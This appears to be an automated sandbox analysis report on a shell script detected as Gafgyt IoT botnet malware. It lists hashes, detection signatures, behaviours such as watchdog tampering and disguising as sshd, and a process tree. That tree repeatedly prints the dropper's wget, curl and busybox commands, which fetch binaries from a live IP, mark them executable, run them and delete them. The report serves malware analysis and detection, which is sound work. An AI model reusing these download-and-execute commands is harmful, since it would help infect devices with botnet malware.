Analysis
-
max time kernel
150s -
max time network
149s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10-12-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
logsbins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
logsbins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
logsbins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
logsbins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
logsbins.sh
-
Size
6KB
-
MD5
883541237878691fb889ea91320abb69
-
SHA1
138fb857e27f94a8b74cde31332a4d4a621e3f94
-
SHA256
79397473a675a56b9fd9508c9db02b8d351be9703130d21031e7381955b6ae1d
-
SHA512
9009d803c1c01938aca4aa2577f0fcbe8dba2262cdf3b29342b986818e1e1ffbe7570254e19cbe1926210a7dc42506aa3ab64898a9fb45c7610220950852215a
-
SSDEEP
192:+pdVJZVlRZZ1JhAYsk4Ik0gIIE4wUITy+WEgaIu2Uj6IjZqy/WT9TD55R2M:d
Malware Config
Signatures
-
Detected Gafgyt variant 13 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_gafgyt behavioral4/files/fstream-2.dat family_gafgyt behavioral4/files/fstream-3.dat family_gafgyt behavioral4/files/fstream-4.dat family_gafgyt behavioral4/files/fstream-5.dat family_gafgyt behavioral4/files/fstream-6.dat family_gafgyt behavioral4/files/fstream-7.dat family_gafgyt behavioral4/files/fstream-8.dat family_gafgyt behavioral4/files/fstream-9.dat family_gafgyt behavioral4/files/fstream-10.dat family_gafgyt behavioral4/files/fstream-11.dat family_gafgyt behavioral4/files/fstream-12.dat family_gafgyt behavioral4/files/fstream-13.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 54 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 727 chmod 824 chmod 925 chmod 948 chmod 988 chmod 713 chmod 905 chmod 920 chmod 1022 chmod 1057 chmod 885 chmod 1017 chmod 1052 chmod 736 chmod 776 chmod 871 chmod 900 chmod 935 chmod 972 chmod 1000 chmod 895 chmod 944 chmod 964 chmod 984 chmod 751 chmod 765 chmod 746 chmod 980 chmod 1012 chmod 756 chmod 855 chmod 1032 chmod 789 chmod 1027 chmod 1037 chmod 910 chmod 915 chmod 960 chmod 1042 chmod 1047 chmod 940 chmod 968 chmod 741 chmod 996 chmod 878 chmod 890 chmod 952 chmod 829 chmod 930 chmod 992 chmod 1005 chmod 844 chmod 956 chmod 976 chmod -
Executes dropped EXE 52 IoCs
ioc pid Process /tmp/m-.ips 715 m-.ips /tmp/m-i.p.-se.l 728 m-i.p.-se.l /tmp/s-..-h-.4 737 s-..-h-.4 /tmp/x.8-.-6.- 742 x.8-.-6.- /tmp/a.-r.-m6 747 a.-r.-m6 /tmp/i--6.-.86 752 i--6.-.86 /tmp/p--.-pc 757 p--.-pc /tmp/i5.-.8..-6 766 i5.-.8..-6 /tmp/m.-..-6-.-8k 777 m.-..-6-.-8k /tmp/s-.-pa.-rc 790 s-.-pa.-rc /tmp/a-.-r.-m.-4 825 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 830 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 845 a.r.-.m7 /tmp/m-.ips 872 m-.ips /tmp/m-i.p.-se.l 879 m-i.p.-se.l /tmp/s-..-h-.4 886 s-..-h-.4 /tmp/x.8-.-6.- 891 x.8-.-6.- /tmp/a.-r.-m6 896 a.-r.-m6 /tmp/i--6.-.86 901 i--6.-.86 /tmp/p--.-pc 906 p--.-pc /tmp/i5.-.8..-6 911 i5.-.8..-6 /tmp/m.-..-6-.-8k 916 m.-..-6-.-8k /tmp/s-.-pa.-rc 921 s-.-pa.-rc /tmp/a-.-r.-m.-4 926 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 931 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 936 a.r.-.m7 /tmp/p-.-.p.-.c 941 p-.-.p.-.c /tmp/m-.ips 945 m-.ips /tmp/m-i.p.-se.l 949 m-i.p.-se.l /tmp/s-..-h-.4 953 s-..-h-.4 /tmp/x.8-.-6.- 957 x.8-.-6.- /tmp/a.-r.-m6 961 a.-r.-m6 /tmp/i--6.-.86 965 i--6.-.86 /tmp/p--.-pc 969 p--.-pc /tmp/i5.-.8..-6 973 i5.-.8..-6 /tmp/m.-..-6-.-8k 977 m.-..-6-.-8k /tmp/s-.-pa.-rc 981 s-.-pa.-rc /tmp/a-.-r.-m.-4 985 a-.-r.-m.-4 /tmp/a.-.--.r.--m-.--5 989 a.-.--.r.--m-.--5 /tmp/a.r.-.m7 993 a.r.-.m7 /tmp/p-.-.p.-.c 997 p-.-.p.-.c /tmp/m-.ips 1001 m-.ips /tmp/m-i.p.-se.l 1006 m-i.p.-se.l /tmp/s-..-h-.4 1013 s-..-h-.4 /tmp/x.8-.-6.- 1018 x.8-.-6.- /tmp/a.-r.-m6 1023 a.-r.-m6 /tmp/i--6.-.86 1028 i--6.-.86 /tmp/p--.-pc 1033 p--.-pc /tmp/i5.-.8..-6 1038 i5.-.8..-6 /tmp/m.-..-6-.-8k 1043 m.-..-6-.-8k /tmp/s-.-pa.-rc 1048 s-.-pa.-rc /tmp/a-.-r.-m.-4 1053 a-.-r.-m.-4 -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog m-i.p.-se.l File opened for modification /dev/misc/watchdog m-i.p.-se.l File opened for modification /dev/watchdog m-i.p.-se.l File opened for modification /dev/misc/watchdog m-i.p.-se.l File opened for modification /dev/watchdog m-i.p.-se.l File opened for modification /dev/misc/watchdog m-i.p.-se.l -
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route m-i.p.-se.l File opened for reading /proc/net/route m-i.p.-se.l File opened for reading /proc/net/route m-i.p.-se.l -
Changes its process name 3 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 728 m-i.p.-se.l Changes the process name, possibly in an attempt to hide itself sshd 879 m-i.p.-se.l Changes the process name, possibly in an attempt to hide itself sshd 1006 m-i.p.-se.l -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route m-i.p.-se.l File opened for reading /proc/net/route m-i.p.-se.l File opened for reading /proc/net/route m-i.p.-se.l -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 11 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 715 m-.ips 719 rm 859 curl 872 m-.ips 945 m-.ips 1001 m-.ips 1003 rm 703 wget 875 rm 946 rm 999 busybox -
Writes file to tmp directory 39 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/a.-r.-m6 wget File opened for modification /tmp/m.-..-6-.-8k wget File opened for modification /tmp/a.r.-.m7 wget File opened for modification /tmp/a.r.-.m7 curl File opened for modification /tmp/i5.-.8..-6 busybox File opened for modification /tmp/s-..-h-.4 wget File opened for modification /tmp/m-.ips busybox File opened for modification /tmp/m.-..-6-.-8k busybox File opened for modification /tmp/a.-.--.r.--m-.--5 busybox File opened for modification /tmp/p--.-pc busybox File opened for modification /tmp/i5.-.8..-6 wget File opened for modification /tmp/s-.-pa.-rc wget File opened for modification /tmp/m-.ips curl File opened for modification /tmp/x.8-.-6.- curl File opened for modification /tmp/p-.-.p.-.c curl File opened for modification /tmp/m-i.p.-se.l busybox File opened for modification /tmp/i--6.-.86 busybox File opened for modification /tmp/s-.-pa.-rc busybox File opened for modification /tmp/m-i.p.-se.l wget File opened for modification /tmp/i--6.-.86 curl File opened for modification /tmp/a-.-r.-m.-4 curl File opened for modification /tmp/x.8-.-6.- busybox File opened for modification /tmp/m-.ips wget File opened for modification /tmp/a.-.--.r.--m-.--5 wget File opened for modification /tmp/a.-r.-m6 curl File opened for modification /tmp/s-..-h-.4 curl File opened for modification /tmp/p--.-pc curl File opened for modification /tmp/s-.-pa.-rc curl File opened for modification /tmp/s-..-h-.4 busybox File opened for modification /tmp/p--.-pc wget File opened for modification /tmp/a-.-r.-m.-4 wget File opened for modification /tmp/i5.-.8..-6 curl File opened for modification /tmp/a.-.--.r.--m-.--5 curl File opened for modification /tmp/a-.-r.-m.-4 busybox File opened for modification /tmp/x.8-.-6.- wget File opened for modification /tmp/i--6.-.86 wget File opened for modification /tmp/m-i.p.-se.l curl File opened for modification /tmp/m.-..-6-.-8k curl File opened for modification /tmp/a.-r.-m6 busybox
Processes
-
/tmp/logsbins.sh/tmp/logsbins.sh1⤵PID:697
-
/usr/bin/wgetwget http://89.147.110.254/m-.ips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:703
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:715
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/wgetwget http://89.147.110.254/m-i.p.-se.l2⤵
- Writes file to tmp directory
PID:720
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:728
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:732
-
-
/usr/bin/wgetwget http://89.147.110.254/s-..-h-.42⤵
- Writes file to tmp directory
PID:733
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:739
-
-
/usr/bin/wgetwget http://89.147.110.254/x.8-.-6.-2⤵
- Writes file to tmp directory
PID:740
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:744
-
-
/usr/bin/wgetwget http://89.147.110.254/a.-r.-m62⤵
- Writes file to tmp directory
PID:745
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:749
-
-
/usr/bin/wgetwget http://89.147.110.254/i--6.-.862⤵
- Writes file to tmp directory
PID:750
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm -rf i--6.-.862⤵PID:754
-
-
/usr/bin/wgetwget http://89.147.110.254/p--.-pc2⤵
- Writes file to tmp directory
PID:755
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm -rf p--.-pc2⤵PID:759
-
-
/usr/bin/wgetwget http://89.147.110.254/i5.-.8..-62⤵
- Writes file to tmp directory
PID:760
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:768
-
-
/usr/bin/wgetwget http://89.147.110.254/m.-..-6-.-8k2⤵
- Writes file to tmp directory
PID:770
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:780
-
-
/usr/bin/wgetwget http://89.147.110.254/s-.-pa.-rc2⤵
- Writes file to tmp directory
PID:782
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:794
-
-
/usr/bin/wgetwget http://89.147.110.254/a-.-r.-m.-42⤵
- Writes file to tmp directory
PID:795
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:827
-
-
/usr/bin/wgetwget http://89.147.110.254/a.-.--.r.--m-.--52⤵
- Writes file to tmp directory
PID:828
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:832
-
-
/usr/bin/wgetwget http://89.147.110.254/a.r.-.m72⤵
- Writes file to tmp directory
PID:833
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:849
-
-
/usr/bin/wgetwget http://89.147.110.254/p-.-.p.-.c2⤵PID:850
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵PID:856
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:857
-
-
/usr/bin/curlcurl -O http://89.147.110.254/m-.ips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:872
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://89.147.110.254/m-i.p.-se.l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:879
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:883
-
-
/usr/bin/curlcurl -O http://89.147.110.254/s-..-h-.42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:888
-
-
/usr/bin/curlcurl -O http://89.147.110.254/x.8-.-6.-2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:893
-
-
/usr/bin/curlcurl -O http://89.147.110.254/a.-r.-m62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:898
-
-
/usr/bin/curlcurl -O http://89.147.110.254/i--6.-.862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm -rf i--6.-.862⤵PID:903
-
-
/usr/bin/curlcurl -O http://89.147.110.254/p--.-pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm -rf p--.-pc2⤵PID:908
-
-
/usr/bin/curlcurl -O http://89.147.110.254/i5.-.8..-62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:913
-
-
/usr/bin/curlcurl -O http://89.147.110.254/m.-..-6-.-8k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:918
-
-
/usr/bin/curlcurl -O http://89.147.110.254/s-.-pa.-rc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:923
-
-
/usr/bin/curlcurl -O http://89.147.110.254/a-.-r.-m.-42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:928
-
-
/usr/bin/curlcurl -O http://89.147.110.254/a.-.--.r.--m-.--52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:933
-
-
/usr/bin/curlcurl -O http://89.147.110.254/a.r.-.m72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:938
-
-
/usr/bin/curlcurl -O http://89.147.110.254/p-.-.p.-.c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:942
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:945
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:950
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:954
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:958
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:962
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm -rf i--6.-.862⤵PID:966
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm -rf p--.-pc2⤵PID:970
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:974
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:978
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:982
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:986
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/a.-.--.r.--m-.--5./a.-.--.r.--m-.--52⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm -rf a.-.--.r.--m-.--52⤵PID:990
-
-
/bin/chmodchmod +x a.r.-.m72⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/a.r.-.m7./a.r.-.m72⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm -rf a.r.-.m72⤵PID:994
-
-
/bin/chmodchmod +x p-.-.p.-.c2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/p-.-.p.-.c./p-.-.p.-.c2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm -rf p-.-.p.-.c2⤵PID:998
-
-
/bin/busyboxbusybox wget -O m-.ips http://89.147.110.254/m-.ips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/chmodchmod +x m-.ips2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/m-.ips./m-.ips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1001
-
-
/bin/rmrm -rf m-.ips2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/busyboxbusybox wget -O m-i.p.-se.l http://89.147.110.254/m-i.p.-se.l2⤵
- Writes file to tmp directory
PID:1004
-
-
/bin/chmodchmod +x m-i.p.-se.l2⤵
- File and Directory Permissions Modification
PID:1005
-
-
/tmp/m-i.p.-se.l./m-i.p.-se.l2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1006
-
-
/bin/rmrm -rf m-i.p.-se.l2⤵PID:1010
-
-
/bin/busyboxbusybox wget -O s-..-h-.4 http://89.147.110.254/s-..-h-.42⤵
- Writes file to tmp directory
PID:1011
-
-
/bin/chmodchmod +x s-..-h-.42⤵
- File and Directory Permissions Modification
PID:1012
-
-
/tmp/s-..-h-.4./s-..-h-.42⤵
- Executes dropped EXE
PID:1013
-
-
/bin/rmrm -rf s-..-h-.42⤵PID:1015
-
-
/bin/busyboxbusybox wget -O x.8-.-6.- http://89.147.110.254/x.8-.-6.-2⤵
- Writes file to tmp directory
PID:1016
-
-
/bin/chmodchmod +x x.8-.-6.-2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/x.8-.-6.-./x.8-.-6.-2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm -rf x.8-.-6.-2⤵PID:1020
-
-
/bin/busyboxbusybox wget -O a.-r.-m6 http://89.147.110.254/a.-r.-m62⤵
- Writes file to tmp directory
PID:1021
-
-
/bin/chmodchmod +x a.-r.-m62⤵
- File and Directory Permissions Modification
PID:1022
-
-
/tmp/a.-r.-m6./a.-r.-m62⤵
- Executes dropped EXE
PID:1023
-
-
/bin/rmrm -rf a.-r.-m62⤵PID:1025
-
-
/bin/busyboxbusybox wget -O i--6.-.86 http://89.147.110.254/i--6.-.862⤵
- Writes file to tmp directory
PID:1026
-
-
/bin/chmodchmod +x i--6.-.862⤵
- File and Directory Permissions Modification
PID:1027
-
-
/tmp/i--6.-.86./i--6.-.862⤵
- Executes dropped EXE
PID:1028
-
-
/bin/rmrm -rf i--6.-.862⤵PID:1030
-
-
/bin/busyboxbusybox wget -O p--.-pc http://89.147.110.254/p--.-pc2⤵
- Writes file to tmp directory
PID:1031
-
-
/bin/chmodchmod +x p--.-pc2⤵
- File and Directory Permissions Modification
PID:1032
-
-
/tmp/p--.-pc./p--.-pc2⤵
- Executes dropped EXE
PID:1033
-
-
/bin/rmrm -rf p--.-pc2⤵PID:1035
-
-
/bin/busyboxbusybox wget -O i5.-.8..-6 http://89.147.110.254/i5.-.8..-62⤵
- Writes file to tmp directory
PID:1036
-
-
/bin/chmodchmod +x i5.-.8..-62⤵
- File and Directory Permissions Modification
PID:1037
-
-
/tmp/i5.-.8..-6./i5.-.8..-62⤵
- Executes dropped EXE
PID:1038
-
-
/bin/rmrm -rf i5.-.8..-62⤵PID:1040
-
-
/bin/busyboxbusybox wget -O m.-..-6-.-8k http://89.147.110.254/m.-..-6-.-8k2⤵
- Writes file to tmp directory
PID:1041
-
-
/bin/chmodchmod +x m.-..-6-.-8k2⤵
- File and Directory Permissions Modification
PID:1042
-
-
/tmp/m.-..-6-.-8k./m.-..-6-.-8k2⤵
- Executes dropped EXE
PID:1043
-
-
/bin/rmrm -rf m.-..-6-.-8k2⤵PID:1045
-
-
/bin/busyboxbusybox wget -O s-.-pa.-rc http://89.147.110.254/s-.-pa.-rc2⤵
- Writes file to tmp directory
PID:1046
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:1047
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:1048
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:1050
-
-
/bin/busyboxbusybox wget -O a-.-r.-m.-4 http://89.147.110.254/a-.-r.-m.-42⤵
- Writes file to tmp directory
PID:1051
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:1052
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:1053
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:1055
-
-
/bin/busyboxbusybox wget -O a.-.--.r.--m-.--5 http://89.147.110.254/a.-.--.r.--m-.--52⤵
- Writes file to tmp directory
PID:1056
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:1057
-
-
/tmp/a.-.--.r./a.-.--.r2⤵PID:1058
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
137KB
MD5105bd89794b076e6863c5f407b1faf34
SHA10b02315f30e75896951ffcfcf08b5aaa95679f63
SHA256a0e6aec1293e05825323c9d06bbb4a043b05a425df506aa6641d8fb47fa230bd
SHA51280954d2f2b6ec737b6db70309773dda487b6c05ad46677fbdad859699bd91e04e685422c274c1a229b24eae07c2dc183d57d29822b27753afb7f428698a6213a
-
Filesize
175KB
MD57c91c482ce6ae001948305f7530ede64
SHA13c7e7f57d13a1a7380b8ae37706ff060165ec384
SHA256a489bedd4b9d9362d37bea448c9a715b6751b91c7d9f9edff9c546f5f7e98eb6
